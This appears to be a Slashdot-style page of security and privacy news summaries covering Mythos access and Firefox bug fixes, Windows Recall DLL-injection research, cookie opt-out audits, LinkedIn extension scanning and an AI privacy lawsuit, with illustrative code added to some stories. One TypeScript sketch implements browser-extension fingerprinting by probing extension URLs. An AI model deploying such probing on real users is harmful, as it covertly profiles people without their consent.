Security

Anthropic's Mythos Model Is Being Accessed by Unauthorized Users (bloomberg.com) 23

Bloomberg reports that a small group of unauthorized users gained access to Anthropic's restricted Mythos model through a mix of contractor-linked access and online sleuthing. Anthropic says it is investigating and has no evidence the access extended beyond a third-party vendor environment or affected its own systems. From the report: The users relied on a mix of tactics to get into Mythos. These included using access the person had as a worker at a third-party contractor for Anthropic and trying commonly used internet sleuthing tools often employed by cybersecurity researchers, the person said. The users are part of a private Discord channel that focuses on hunting for information about unreleased models, including by using bots to scour for details that Anthropic and others have posted on unsecured websites such as GitHub. [...] To access Mythos, the group of users made an educated guess about the model's online location based on knowledge about the format Anthropic has used for other models, the person said, adding that such details were revealed in a recent data breach from Mercor, an AI training startup that works with a number of top developers.

Crucially, the person also has permission to access Anthropic models and software related to evaluating the technology for the startup. They gained this access from a company for which they have performed contract work evaluating Anthropic's AI models. Bloomberg is not naming the company for security reasons. The group is interested in playing around with new models, not wreaking havoc with them, the person said. The group has not run cybersecurity-related prompts on the Mythos model, the person said, preferring instead to try tasks like building simple websites in an attempt to avoid detection by Anthropic. The person said the group also has access to a slew of other unreleased Anthropic AI models.

Firefox

Mozilla Uses Anthropic's Mythos To Fix 271 Bugs In Firefox (nerds.xyz) 151

BrianFagioli writes: Mozilla says it used an early version of Anthropic's Claude Mythos Preview to comb through Firefox's code, and the results were hard to ignore. In Firefox 150, the team fixed 271 vulnerabilities identified during this effort, a number that would have been unthinkable not long ago. Instead of relying only on fuzzing tools or human review, the AI was able to reason through code and surface issues that typically require highly specialized expertise.

The bigger implication is less about one release and more about where this is heading. Security has long favored attackers, since they only need to find a single flaw while defenders have to protect everything. If AI can scale vulnerability discovery for defenders, that dynamic could start to shift. It does not mean zero days disappear overnight, but it suggests a future where bugs are found and fixed faster than attackers can weaponize them.
"Computers were completely incapable of doing this a few months ago, and now they excel at it," says Mozilla in a blog post. "We have many years of experience picking apart the work of the world's best security researchers, and Mythos Preview is every bit as capable. So far we've found no category or complexity of vulnerability that humans can find that this model can't."

The company concluded: "The defects are finite, and we are entering a world where we can finally find them all."
PlayStation (Games)

PlayStation To Require Age Verification For Messages and Voice Chat (insider-gaming.com) 67

A new email from Sony says that PlayStation will require players to verify their age later this year to keep using communication features like messages and voice chat. Insider-Gaming reports: The initiative stems from the goal of providing "safe, age-appropriate experiences for players and families while respecting their privacy" and "meaningful control over their gaming experiences." The age-verification process will be implemented globally, and players will need to verify their age to continue using PlayStation communication services, such as messages and voice chat. Players who opt not to verify can still use other services, such as games, trophies, and the store; only the communication experience will be affected. PlayStation didn't provide a date for when players will need to begin the verification process.
United States

Nevada Police Can Now Track Cellphones Without a Warrant (apnews.com) 62

"Nevada quietly signed an agreement earlier this year with a company that collects location data from cellphones, allowing police to track a device virtually in real time," reports the Associated Press. "All without a warrant." The software from Fog Data Science, adopted this January in Nevada through a Department of Public Safety contract, pulls information from smartphone apps in order to let state investigators identify the location of mobile devices. The state is allowed more than 250 queries a month using the tool, which allows officers to track a device's location over long stretches of time and enables them to see what Fog calls "patterns of life," according to company documents from 2022. It can help them deduce where and when people work and live, with whom they associate and what places they visit, according to privacy experts... Traditionally, police must obtain a warrant from a judge to access cellphone location information — a process that can take days or weeks. And while cellphone users may be aware that they are sharing their location through apps such as Google Maps, critics say few are aware that such information can make its way to police...

Other agencies in Nevada have been known to use technology similar to Fog. In 2013, Las Vegas Metropolitan Police Department acquired something known as a cell-site simulator that mimics cellphone towers and can sweep up signals from entire areas to track individuals, with some models capable of intercepting texts and calls. Police have not released detailed information about the technology since then.

"Police in other states have said the technology (and its low price tag) has helped expand investigatory capacity," the article adds.

But it also points out that Fog Data Science has a web page letting individuals opt out of all their data sets.
Privacy

US Congress Fails to Pass Long-Term FISA Extension, Authorizes It Through April 30 (cnn.com) 41

Yesterday the U.S. Congress approved "a short-term extension" of a FISA law that allows wiretaps without a warrant for surveilling foreign targets, reports CNN — but only until April 30. Republican congressional leaders had sought an 18-month extension, but "failed to secure" the votes after "clamoring from some of their members for reforms to protect Americans' privacy." The warrantless surveillance law, known as Section 702 of the Foreign Intelligence Surveillance Act, was set to expire on Monday night. Members are hoping the additional time will allow them to come to agreement without ending authorization for the intelligence gathering program, which permits US officials to monitor phone calls and text messages from foreign targets... There was an hour of suspense in the Senate Friday morning when it appeared possible that Democratic Sen. Ron Wyden, a longtime critic of FISA 702, might block the House-passed extension. But ultimately, he said his House colleagues had assured him "this short-term extension makes reform more likely, and expiration makes reform less likely," and so he chose not to object....

House Republican leaders believed Thursday night they had struck a deal with conservative holdouts who harbor deep and longstanding concerns that a key piece of the law infringes on Americans' privacy rights. But in a pair of after-midnight votes, more than a dozen rank-and-file Republicans rejected the long-term reauthorization plan on the floor, which was the result of days of tense negotiations among leadership, lawmakers and the White House.

The law allows authorized US officials to gather phone calls and text messages of foreign targets, but they can also incidentally collect the data of Americans in the process. Senior national security officials have for years said the law is critical for thwarting terror attacks, stemming the flow of fentanyl into the US and stopping ransomware attacks on critical infrastructure. Civil liberties groups on the left and the right, meanwhile, argue the surveillance authority risks infringing on Americans' privacy.

Privacy

Shuttered Startups Are Selling Old Slack Chats, Emails To AI Companies 41

Some failed startups are reportedly selling old Slack messages, emails, and other internal records to AI companies as training data, creating a new way to cash out after shutting down. Fast Company reports: Shanna Johnson, the CEO of now-defunct software company Cielo24, told Forbes that she was able to sell every Slack message, internal email, and Jira ticket as training data for "hundreds of thousands of dollars."

This isn't a one-off scenario. SimpleClosure, a startup that helps companies like Cielo24 shut down, told Forbes that there's been major interest from AI companies trying to get their hands on workplace data. Because of this, SimpleClosure launched a new tool that allows companies to sell their wealth of internal communications -- from Slack archives to email chains -- to AI labs. The company said it's processed 100 such deals in the past year. Payouts ranged from $10,000 to $100,000.
"I think the privacy issues here are quite substantial," Marc Rotenberg, founder of the Center for AI and Digital Policy, told Forbes. "Employee privacy remains a key concern, particularly because people have become so dependent on these new internal messaging tools like Slack. ... It's not generic data. It's identifiable people."
Privacy

'TotalRecall Reloaded' Tool Finds a Side Entrance To Windows 11 Recall Database (arstechnica.com) 29

An anonymous reader quotes a report from Ars Technica: Two years ago, Microsoft launched its first wave of "Copilot+" Windows PCs with a handful of exclusive features that could take advantage of the neural processing unit (NPU) hardware being built into newer laptop processors. These NPUs enable AI and machine-learning features that run locally rather than in the cloud, theoretically enhancing security and privacy. One of the first Copilot+ features was Recall, which promised to track all your PC usage via screenshots to help you remember your past activity. But as originally implemented, Recall was neither private nor secure; the feature stored its screenshots plus a giant database of all user activity in totally unencrypted files on the user's disk, making it trivial for anyone with remote or local access to grab days, weeks, or even months of sensitive data, depending on the age of the user's Recall database.

After journalists and security researchers discovered and detailed these flaws, Microsoft delayed the Recall rollout by almost a year and substantially overhauled its security. All locally stored data would now be encrypted and viewable only with Windows Hello authentication; the feature now did a better job detecting and excluding sensitive information, including financial information, from its database; and Recall would be turned off by default, rather than enabled on every PC that supported it. The reconstituted Recall was a big improvement, but having a feature that records the vast majority of your PC usage is still a security and privacy risk. Security researcher Alexander Hagenah was the author of the original "TotalRecall" tool that made it trivially simple to grab the Recall information on any Windows PC, and an updated "TotalRecall Reloaded" version exposes what Hagenah believes are additional vulnerabilities.

The problem, as detailed by Hagenah on the TotalRecall GitHub page, isn't with the security around the Recall database, which he calls "rock solid." The problem is that, once the user has authenticated, the system passes Recall data to another system process called AIXHost.exe, and that process doesn't benefit from the same security protections as the rest of Recall. "The vault is solid," Hagenah writes. "The delivery truck is not." The TotalRecall Reloaded tool uses an executable file to inject a DLL file into AIXHost.exe, something that can be done without administrator privileges. It then waits in the background for the user to open Recall and authenticate using Windows Hello. Once this is done, the tool can intercept screenshots, OCR'd text, and other metadata that Recall sends to the AIXHost.exe process, which can continue even after the user closes their Recall session.

"The VBS enclave won't decrypt anything without Windows Hello," Hagenah writes. "The tool doesn't bypass that. It makes the user do it, silently rides along when the user does it, or waits for the user to do it." A handful of tasks, including grabbing the most recent Recall screenshot, capturing select metadata about the Recall database, and deleting the user's entire Recall database, can be done with no Windows Hello authentication. Once authenticated, Hagenah says the TotalRecall Reloaded tool can access both new information recorded to the Recall database as well as data Recall has previously recorded.
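The trust-boundary problem Hagenah describes can be modeled abstractly: the authenticated "vault" is sound, but it hands plaintext to a delivery process that accepts listeners without any privilege check. A conceptual TypeScript model follows (invented class names standing in for the VBS enclave and AIXHost.exe; this illustrates the architectural flaw, not actual Windows internals):

```typescript
// Conceptual model: the vault releases data only after authentication, but
// the delivery process lets any same-privilege code register as a listener.
// Invented names -- a sketch of the trust boundary, not Windows internals.

type Listener = (screenshot: string) => void;

class DeliveryProcess {            // stands in for AIXHost.exe
  private listeners: Listener[] = [];
  attach(l: Listener) { this.listeners.push(l); }  // no privilege check here
  deliver(data: string) { this.listeners.forEach((l) => l(data)); }
}

class Vault {                      // stands in for the VBS enclave
  constructor(private courier: DeliveryProcess) {}
  open(authenticated: boolean, data: string) {
    if (!authenticated) throw new Error("Windows Hello required");
    this.courier.deliver(data);    // plaintext leaves the protected boundary
  }
}

const courier = new DeliveryProcess();
const vault = new Vault(courier);

const legit: string[] = [];
const eavesdropper: string[] = [];
courier.attach((s) => legit.push(s));        // the real Recall UI
courier.attach((s) => eavesdropper.push(s)); // injected code riding along

vault.open(true, "screenshot-2024-04-01");   // the user authenticates once...
console.log(eavesdropper.length);            // ...and the rider sees it too
```

In this model the vault's own check never fails; the leak happens entirely downstream of it, which is the "solid vault, insecure delivery truck" shape of the reported issue.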
"We appreciate Alexander Hagenah for identifying and responsibly reporting this issue. After careful investigation, we determined that the access patterns demonstrated are consistent with intended protections and existing controls, and do not represent a bypass of a security boundary or unauthorized access to data," a Microsoft spokesperson told Ars. "The authorization period has a timeout and anti-hammering protection that limit the impact of malicious queries."
The Internet

Audit Finds Google, Microsoft, and Meta Still Tracking Users After Opt-Out (404media.co) 48

alternative_right shares a report from 404 Media: An independent privacy audit of Microsoft, Meta, and Google web traffic in California found that the companies may be violating state regulations and could be racking up billions of dollars in potential fines. According to the audit from privacy search engine webXray, 55 percent of the sites it checked set ad cookies in a user's browser even if they opted out of tracking. Each company disputed or took issue with the research, with Google saying it was based on a "fundamental misunderstanding" of how its product works.

The webXray California Privacy Audit viewed web traffic on more than 7,000 popular websites in California in the month of March and found that most tech companies ignore when a user asks to opt out of cookie tracking. California has stringent and well-defined privacy legislation thanks to its California Consumer Privacy Act (CCPA), which allows users to, among other things, opt out of the sale of their personal information. There's a system called Global Privacy Control (GPC), which includes a browser extension that indicates to a website when a user wants to opt out of tracking.

According to the webXray audit, Google failed to let users opt out 87 percent of the time. "Google's failure to honor the GPC opt-out signal is easy to find in network traffic. When a browser using GPC connects to Google's servers it encodes the opt-out signal by sending the code 'sec-gpc: 1.' This means Google should not return cookies," the audit said. "However, when Google's server responds to the network request with the opt-out it explicitly responds with a command to create an advertising cookie named IDE using the 'set-cookie' command. This non-compliance is easy to spot, hiding in plain sight."

The audit said that Microsoft fails to opt users out in the same way, with a failure rate of 50 percent in the web traffic webXray viewed. Meta's failure rate was 69 percent, and its non-compliance was more comprehensive. "Meta instructs publishers to install the following tracking code on their websites. The code contains no check for globally standard opt-out signals -- it loads unconditionally, fires a tracking event, and sets a cookie regardless of the consumer's privacy preferences," the audit said. It showed a copy of Meta's tracking code, which contains no GPC check at all.
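The check the audit performs is simple to express in code: the browser sends the opt-out as the `Sec-GPC: 1` request header, and a compliant server suppresses non-essential `Set-Cookie` responses when it sees it. A minimal TypeScript sketch of that decision (hypothetical helper names; not any of the audited companies' actual server code):

```typescript
// Honoring the Global Privacy Control opt-out before setting ad cookies.
// Hypothetical sketch -- not the audited companies' actual code.

type RequestHeaders = Record<string, string>;

// "Sec-GPC: 1" signals an opt-out of sale/sharing under laws like the CCPA.
function adCookiesAllowed(headers: RequestHeaders): boolean {
  return headers["sec-gpc"]?.trim() !== "1";
}

// Build Set-Cookie values for a response, dropping advertising cookies
// (like the "IDE" cookie named in the audit) when the opt-out is present.
function buildSetCookies(headers: RequestHeaders): string[] {
  const cookies = ["session=abc123; HttpOnly"]; // essential, always allowed
  if (adCookiesAllowed(headers)) {
    cookies.push("IDE=xyz; SameSite=None; Secure"); // advertising cookie
  }
  return cookies;
}

console.log(buildSetCookies({ "sec-gpc": "1" })); // session cookie only
console.log(buildSetCookies({}));                 // session + ad cookie
```

The same signal is also exposed to page scripts as the proposed `navigator.globalPrivacyControl` property, which a tracking snippet could consult before firing; the audit's point about Meta's publisher code is that it performs no such check on either side.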

Privacy

Meta Is Warned That Facial Recognition Glasses Will Arm Sexual Predators (wired.com) 90

An anonymous reader quotes a report from Wired: More than 70 civil liberties, domestic violence, reproductive rights, LGBTQ+, labor, and immigrant advocacy organizations are demanding that Meta abandon plans to deploy face recognition on its Ray-Ban and Oakley smart glasses, warning that the feature -- reportedly known inside the company as "Name Tag" -- would hand stalkers, abusers, and federal agents the ability to silently identify strangers in public. The coalition, which includes the ACLU, the Electronic Privacy Information Center, Fight for the Future, Access Now, and the Leadership Conference on Civil and Human Rights, is demanding Meta kill the feature before launch, after internal documents surfaced showing the company hoped to use the current "dynamic political environment" as cover for the rollout, betting that civil society groups would have their resources "focused on other concerns."

Name Tag, as revealed in February by The New York Times, would work through the artificial intelligence assistant built into Meta's smart glasses, allowing wearers to pull up information about people in their field of view. Engineers have reportedly been weighing two versions of the feature: one that would only identify people the wearer is already connected to on a Meta platform, and a broader version that could recognize anyone with a public account on a Meta service such as Instagram. The coalition wants Meta to scrap the feature entirely. In a letter to CEO Mark Zuckerberg on Monday, it argues that face recognition in inconspicuous consumer eyewear "cannot be resolved through product design changes, opt-out mechanisms, or incremental safeguards." Bystanders in public have no meaningful way to consent to being identified, it says.

Meta is also urged to disclose any known instances of its wearables being used in stalking, harassment, or domestic violence cases; disclose any past or ongoing discussions with federal law enforcement agencies, including Immigration and Customs Enforcement and Customs and Border Protection, about the use of Meta wearables or data from them; and commit to consulting civil society and independent privacy experts before integrating biometric identification into any consumer device. "People should be able to move through their daily lives without fear that stalkers, scammers, abusers, federal agents, and activists across the political spectrum are silently and invisibly verifying their identities and potentially matching their names to a wealth of readily available data about their habits, hobbies, relationships, health, and behaviors," write the groups, which also include Common Cause, Jane Doe Inc., UltraViolet, the National Organization for Women, the New York State Coalition Against Domestic Violence, the Library Freedom Project, and Old Dykes Against Billionaire Tech Bros, among others.

AI

Californians Sue Over AI Tool That Records Doctor Visits (arstechnica.com) 34

An anonymous reader quotes a report from Ars Technica: Several Californians sued Sutter Health and MemorialCare this week over allegations that an AI transcription tool was used to record them without their consent, in violation of state and federal law. The proposed class-action lawsuit, filed on Wednesday in federal court in San Francisco, states that, within the past six months, the plaintiffs received medical care at various Sutter and MemorialCare facilities.

During those visits, medical staff used Abridge AI. According to the complaint, this system "captured and processed their confidential physician-patient communications. Plaintiffs did not receive clear notice that their medical conversations would be recorded by an artificial intelligence platform, transmitted outside the clinical setting, or processed through third-party systems." The complaint adds that these recordings "contained individually identifiable medical information, including but not limited to medical histories, symptoms, diagnoses, medications, treatment discussions, and other sensitive health disclosures communicated during confidential medical consultations."

In recent years, Abridge's software and AI service have been rapidly deployed across major health care providers nationwide, including Kaiser Permanente, the Mayo Clinic, Duke Health, and many more. When activated, the software captures, transcribes, and summarizes conversations between patients and doctors, and it turns them into clinical notes. Sutter Health began partnering with Abridge two years ago. Sutter spokesperson Liz Madison said the company is aware of the lawsuit. "We take patient privacy seriously and are committed to protecting the security of our patients' information," Madison said. "Technology used in our clinical settings is carefully evaluated and implemented in accordance with applicable laws and regulations."

EU

EU Parliament Fails To Renew Loophole Allowing Tech Firms To Detect Abuse (theguardian.com) 17

Bruce66423 shares a report from the Guardian: The European parliament has blocked the extension of a law that permits big tech firms to scan for child sexual exploitation on their platforms, creating a legal gap that child safety experts say will lead to crimes going undetected. The law, which was a carve-out of the EU Privacy Act, was put in place in 2021 as a temporary measure allowing companies to use automated detection technologies to scan messages for harms, including child sexual abuse material (CSAM), grooming and sextortion. However, it expired on April 3, and the EU parliament decided not to vote to extend it, amid privacy concerns from some lawmakers.

The regulatory gap has created uncertainty for big tech companies: while scanning for harms on their platforms is now illegal, they remain obligated to remove any illegal content hosted on their platforms under a different law, the Digital Services Act. Google, Meta, Snap and Microsoft said they would continue to voluntarily scan their platforms for CSAM, in a joint statement posted on a Google blog.
Bruce66423 adds: "Child abuse as the excuse for avoiding privacy protections. Who would have thought it?"
Encryption

Google Rolls Out Gmail End-To-End Encryption On Mobile Devices (bleepingcomputer.com) 27

Gmail's end-to-end encryption is now available on all Android and iOS devices, letting enterprise users send and read encrypted emails directly in the app without any extra tools. "This launch combines the highest level of privacy and data encryption with a user-friendly experience for all users, enabling simple encrypted email for all customers from small businesses to enterprises and public sector," Google announced in a blog post. BleepingComputer reports: Starting this week, encrypted messages will be delivered as regular emails to Gmail recipients' inboxes if they use the Gmail app. Recipients who don't have the Gmail mobile app and use other email services can read them in a web browser, regardless of the device and service they're using.

[...] This feature is now available for all client-side encryption (CSE) users with Enterprise Plus licenses and the Assured Controls or Assured Controls Plus add-on after admins enable the Android and iOS clients in the CSE admin interface via the Admin Console. Gmail's end-to-end encryption (E2EE) feature is powered by the client-side encryption (CSE) technical control, which allows Google Workspace organizations to use encryption keys that they control and that are stored outside Google's servers to protect sensitive documents and emails.
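The CSE model described here boils down to encrypting content on the client with a customer-held key, so the provider only ever stores ciphertext. A toy TypeScript illustration of that flow using Node's built-in crypto (this sketches the concept only; Google's actual key service and wire protocol are different and not shown):

```typescript
// Toy illustration of the client-side encryption (CSE) idea: the message is
// encrypted with a customer-held key before it reaches the provider, which
// stores only ciphertext. Not Google's actual protocol or key service.
import { createCipheriv, createDecipheriv, randomBytes } from "node:crypto";

// The customer's key lives in an external key service, never with the provider.
const customerKey = randomBytes(32); // AES-256 key

function encryptForProvider(plaintext: string) {
  const iv = randomBytes(12); // fresh nonce per message
  const cipher = createCipheriv("aes-256-gcm", customerKey, iv);
  const ciphertext = Buffer.concat([cipher.update(plaintext, "utf8"), cipher.final()]);
  return { iv, ciphertext, tag: cipher.getAuthTag() }; // what the provider stores
}

function decryptOnClient(msg: { iv: Buffer; ciphertext: Buffer; tag: Buffer }) {
  const decipher = createDecipheriv("aes-256-gcm", customerKey, msg.iv);
  decipher.setAuthTag(msg.tag); // integrity check fails if tampered
  return Buffer.concat([decipher.update(msg.ciphertext), decipher.final()]).toString("utf8");
}

const stored = encryptForProvider("quarterly numbers attached");
// The provider sees only random-looking bytes; only a client holding the
// customer key can recover the text.
console.log(decryptOnClient(stored));
```

The design choice worth noting is the key location: because the key stays with the customer, the provider cannot decrypt the mail even under compulsion, which is what distinguishes CSE from ordinary at-rest encryption.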

Bitcoin

NYT Claims Adam Back Is Bitcoin Creator Satoshi Nakamoto (nytimes.com) 85

A New York Times investigation by John Carreyrou claims a British cryptographer named Adam Back is the strongest circumstantial candidate yet for being Satoshi Nakamoto. The report cites overlaps in writing style, ideology, technical background, and old posts that outlined key parts of Bitcoin years before its launch. Carreyrou is a renowned investigative journalist and author, best known for exposing the massive fraud at Theranos while at the Wall Street Journal. Here's an excerpt from the report: ... As anyone steeped in Bitcoin lore will tell you, Satoshi was a master at the art of maintaining anonymity on the internet, leaving few, if any, digital footprints behind. But Satoshi did leave behind a corpus of texts, including a nine-page white paper (PDF) outlining his invention and his many posts on the Bitcointalk forum, an online message board where users gathered to discuss the digital currency's software, economics and philosophy. And that corpus, it turned out, had expanded significantly during the impostor's civil trial when Martti Malmi, a Finnish programmer who collaborated with Satoshi in Bitcoin's early days, released a trove of hundreds of emails he had exchanged with him. Emails Satoshi sent to other early Bitcoin adopters had surfaced before, but none came close in volume to the Malmi dump. If Satoshi was ever going to be found, I was convinced the key lay somewhere in these texts.

Then again, others must have gone down this road before me. Journalists, academics and internet sleuths had been trying to identify Satoshi for 16 years. During that span, more than 100 names had been put forward, including those of an Irish cryptography student, an unemployed Japanese American engineer, a South African criminal mastermind and the mathematician portrayed in the movie "A Beautiful Mind." The most alluring theories had focused on coincidences that aligned with what little was known about Satoshi: a particular code-writing style, a mysterious work history, an expertise in Bitcoin's key technical concepts, an anti-government worldview. But they had run aground under the weight of an alibi or some other piece of inconsistent or contrary evidence. Each failure had been met with glee by many members of the Bitcoin community. As they liked to point out, only Satoshi could definitively prove his identity by moving some of his coins. Any evidence short of that would be circumstantial.

It seemed foolish to think that I could somehow crack a case that had confounded so many others. But I craved the thrill of a big, challenging story. So I decided to try once more to unmask Bitcoin's mysterious creator.
Back, for his part, denies being Satoshi, writing in a post on X: "i'm not satoshi, but I was early in laser focus on the positive societal implications of cryptography, online privacy and electronic cash, hence my ~1992 onwards active interest in applied research on ecash, privacy tech on cypherpunks list which led to hashcash and other ideas."
Privacy

LinkedIn Faces Spying Allegations Over Browser Extension Scanning (pcmag.com) 70

LinkedIn is facing allegations that it quietly scans users' browsers for installed Chrome extensions. The German group Fairlinked e.V. goes so far as to claim that the site is "running one of the largest corporate espionage operations in modern history."

"The program runs silently, without any visible indicator to the user," the group says. "It does not ask for consent. It does not disclose what it is doing. It reports the results to LinkedIn's servers. This is not a one-time check. The scan runs on every page load, for every visitor." PCMag reports: This browser extension "fingerprinting" technique has been spotted before, but it was previously found to probe only 2,000 to 3,000 extensions. Fairlinked alleges that LinkedIn is now scanning for 6,222 extensions that could indicate a user's political opinions or religious views. For example, the extensions LinkedIn will look for include one that flags companies as too "woke," one that can add an "anti-Zionist" tag to LinkedIn profiles, and two others that can block content forbidden under Islamic teachings.
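Extension fingerprinting of this kind generally works by probing, from ordinary page JavaScript, resources that extensions expose to web pages: a load that succeeds reveals the extension is installed. A TypeScript sketch of the general method, with a stubbed loader standing in for the browser (the extension IDs and resource paths are invented; this illustrates the technique, not LinkedIn's actual script):

```typescript
// Browser-extension fingerprinting: probe each extension's "web accessible
// resource" URL; a successful load means the extension is installed.
// IDs and paths are invented -- a sketch of the technique only.

interface Probe {
  id: string;       // Chrome extension ID (32 chars, a-p)
  resource: string; // a file the extension exposes to web pages
}

type Loader = (url: string) => Promise<boolean>; // true if the resource loads

async function detectExtensions(probes: Probe[], load: Loader): Promise<string[]> {
  const found: string[] = [];
  for (const p of probes) {
    // In a real page this would be a fetch/<img> against the extension URL.
    if (await load(`chrome-extension://${p.id}/${p.resource}`)) {
      found.push(p.id);
    }
  }
  return found;
}

// Demo with a stubbed loader in place of the browser.
const installed = new Set(["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"]);
const stubLoad: Loader = async (url) =>
  [...installed].some((id) => url.includes(id));

const probes: Probe[] = [
  { id: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", resource: "icon.png" },
  { id: "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", resource: "inject.js" },
];

detectExtensions(probes, stubLoad).then((ids) => console.log(ids));
```

Scaled to thousands of probes on every page load, as alleged here, the list of hits becomes a fingerprint of the visitor, which is why the specific extensions being probed matter so much.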

It would also be a cakewalk to tie the collected extension data to specific users, since LinkedIn operates as a vast professional social network that covers people's work history. Fairlinked's concern is that Microsoft and LinkedIn can allegedly use the data to identify which companies use competing products. "LinkedIn has already sent enforcement threats to users of third-party tools, using data obtained through this covert scanning to identify its targets," the group claims. However, LinkedIn claims that Fairlinked mischaracterizes a LinkedIn safeguard designed to prevent web scraping by browser extensions. "We do not use this data to infer sensitive information about members," the company says. "To protect the privacy of our members, their data, and to ensure site stability, we do look for extensions that scrape data without members' consent or otherwise violate LinkedIn's Terms of Service," LinkedIn adds.

[...] The statement goes on to allege that Fairlinked is from a developer whose account was previously suspended for web scraping. One of the group's board members is listed as "S.Morell," which appears to be Steven Morell, the founder of Teamfluence, a tool that helps businesses monitor LinkedIn activity. [...] Still, the Microsoft-owned site is facing some blowback for not clearly disclosing the browser extension scanning in LinkedIn's privacy policy. Fairlinked is soliciting donations for a legal fund to take on Microsoft and is urging the public to encourage local regulators to intervene.

The Internet

Fan Fiction Website AO3 Exits Beta After 17 Years 3

Archive of Our Own (AO3) is officially dropping its "beta" label after 17 years. The Organization for Transformative Works, the nonprofit behind the fanfiction site, said the site will keep evolving with new improvements even though it's no longer technically in beta.

"As the AO3 software has been stable for a long time, the change is mostly cosmetic and does not indicate that everything is finalized or perfectly working," the organization says. "Exiting beta doesn't mean we'll stop continuing to improve AO3 -- our volunteer coders and community contributors will still be working to add to and improve AO3 every day."

Some of the features it's introduced over the years include a tag system, offline fanworks downloads, privacy settings that let creators restrict access to their work, and new modes for multi-chapter works. As it stands, the site says it has more than 10 million registered users and 17 million fanworks.
The Courts

Perplexity's 'Incognito Mode' Is a 'Sham,' Lawsuit Says 5

An anonymous reader quotes a report from Ars Technica: Perplexity's AI search engine encourages users to go deeper with their prompts by engaging in chat sessions that a lawsuit has alleged are often shared in their entirety with Google and Meta without users' knowledge or consent. "This happened to every user regardless of whether or not they signed up for a Perplexity account," the lawsuit alleged, while stressing that "enormous volumes of sensitive information from both subscribed and non-subscribed users" are shared.

Using developer tools, the lawsuit found that opening prompts are always shared, as are any follow-up questions the search engine asks that a user clicks on. Privacy concerns are seemingly worse for non-subscribed users, the complaint alleged. Their initial prompts are shared along with "a URL through which the entire conversation may be accessed by third parties like Meta and Google." Disturbingly, the lawsuit alleged, chats are also shared with personally identifiable information (PII), even when users who want to stay anonymous opt to use Perplexity's "Incognito Mode." That mode, the lawsuit charged, is a "sham."

"'Incognito' mode does nothing to protect users from having their conversations shared with Meta and Google," the complaint said. "Even paid users who turned on the 'Incognito' feature still had their conversations shared with Meta and Google, along with their email addresses and other identifiers that allowed Meta and Google to personally identify them."
"Perplexity's failure to inform its users that their personal information has been disclosed to Meta and Google or to take any steps to halt the continued disclosure of users' information is malicious, oppressive, and in reckless disregard" of users' rights, the lawsuit alleged.

"Nothing on Perplexity's website warns users that their conversations with its AI Machine will be shared with Meta and Google," Doe alleged. "Much less does Perplexity warn subscribed users that its 'Incognito Mode' does not function to protect users' private conversations from disclosure to companies like Meta and Google."
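The kind of developer-tools inspection described in the complaint can be reproduced by exporting a browser session as a HAR capture and scanning it for requests to third-party hosts that carry the prompt text. Below is a minimal, illustrative Python sketch: the hostnames, the inline HAR snippet, and the `find_third_party_leaks` helper are all hypothetical, not taken from the lawsuit.

```python
from urllib.parse import urlparse

def find_third_party_leaks(har: dict, first_party: str, needle: str) -> list:
    """Return URLs of captured requests to third-party hosts whose URL or
    POST body contains the given text (e.g. a chat prompt)."""
    leaks = []
    for entry in har.get("log", {}).get("entries", []):
        req = entry["request"]
        host = urlparse(req["url"]).hostname or ""
        if host.endswith(first_party):
            continue  # same-site traffic is expected
        body = (req.get("postData") or {}).get("text", "")
        if needle in req["url"] or needle in body:
            leaks.append(req["url"])
    return leaks

# Hypothetical HAR capture: one first-party API call, one beacon to a tracker
har = {"log": {"entries": [
    {"request": {"url": "https://search.example.com/api/query?q=my+prompt"}},
    {"request": {"url": "https://tracker.example.net/collect",
                 "postData": {"text": "q=my secret prompt&uid=12345"}}},
]}}

print(find_third_party_leaks(har, "search.example.com", "my secret prompt"))
# -> ['https://tracker.example.net/collect']
```

Real HAR files exported from a browser's Network tab follow this same `log.entries` layout, so the helper can be pointed at an actual capture with `json.load`.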
The Internet

Cloudflare Announces EmDash As Open-Source 'Spiritual Successor' To WordPress (phoronix.com) 41

In classic Cloudflare fashion, the CDN provider used April Fools' Day to unveil an actual, "not a joke" product. Today, the company announced EmDash -- an open-source "spiritual successor" to WordPress that aims to solve plugin security. Phoronix reports: With the help of AI coding agents, Cloudflare engineers have been rebuilding the WordPress open-source project "from the ground up." EmDash is written entirely in TypeScript and uses a serverless design. To make plugins more secure than in the WordPress architecture, each EmDash plugin is sandboxed and runs in its own isolate. EmDash builds upon the Astro web framework and, while it doesn't rely on any WordPress code, is designed to be compatible with WordPress functionality. The EmDash code is available now on GitHub under the MIT license.
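EmDash itself is TypeScript and uses isolates; as an illustration of the underlying idea (run each plugin outside the host so a crashing or hanging plugin cannot take the host down), here is a minimal Python sketch. The `run_plugin` harness and the plugin sources are hypothetical, and note that a plain child process gives fault isolation only; a real isolate also restricts what the plugin is allowed to touch.

```python
import json
import subprocess
import sys

def run_plugin(source: str, payload: dict, timeout: float = 5.0) -> dict:
    """Run plugin code in a separate Python process, passing data over
    stdin/stdout, so an exception or hang in the plugin never reaches
    the host process."""
    harness = (
        "import sys, json\n"
        + source + "\n"
        + "print(json.dumps(plugin(json.loads(sys.stdin.read()))))\n"
    )
    try:
        proc = subprocess.run(
            [sys.executable, "-c", harness],
            input=json.dumps(payload),
            capture_output=True, text=True, timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return {"ok": False, "error": "plugin timed out"}
    if proc.returncode != 0:
        err = proc.stderr.strip().splitlines()
        return {"ok": False, "error": err[-1] if err else "plugin failed"}
    return {"ok": True, "result": json.loads(proc.stdout)}

# A well-behaved plugin and one that crashes: only the child process dies
good = "def plugin(data):\n    return {'title': data['title'].upper()}"
bad = "def plugin(data):\n    raise RuntimeError('boom')"
print(run_plugin(good, {"title": "hello"}))
print(run_plugin(bad, {"title": "hello"})["ok"])
```

The JSON-over-pipes boundary is the important design choice: the host never shares memory with the plugin, which is the same property V8-style isolates provide in-process.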
The Courts

OkCupid Settles FTC Case On Alleged Misuse of Its Users' Personal Data (engadget.com) 11

